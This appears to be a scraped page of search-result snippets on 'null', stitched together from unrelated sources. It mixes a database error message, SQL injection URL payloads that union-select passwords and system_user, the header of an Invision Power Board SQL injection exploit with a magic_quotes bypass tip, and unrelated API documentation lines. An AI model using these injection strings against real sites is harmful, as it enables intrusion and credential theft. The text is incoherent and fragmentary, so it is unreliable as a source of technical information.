15. File upload - null byte


can't select db: Could not locate entry in sysdatabases for database 'название базы'.

...SQL Injection forum.php?forum=-1%20union%20select%20password,password,null,null%20from% 20test_mysql_injection%20where%20uid=1/* Envolution v.1.1.0 SQL

...null,null,null,null,system _user,null,null,null,null,null,null,null,null,null ,null-- 1 M1lten

For instance, all events with NULL TicketId can be retrieved by

...Day_qf=xek&City_qf=%2522+union+select+null,null,null,concat_w s(0x3a

## Invision Power Board SQL injection exploit by RST/GHC ## vulnerable forum versions : 1.* , 2.* (<2.0.4) ## tested on version 1.3 Final and version 2.0.2 ## * work on all mysql versions ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On) ## (c)oded by 1dt.w0lf...

SELECT SQLStatement ='SELECT '+colnames+' FROM user_states_ord_return_list where username is null '

If null is provided as a directorySetting, you will get back all available directory settings.

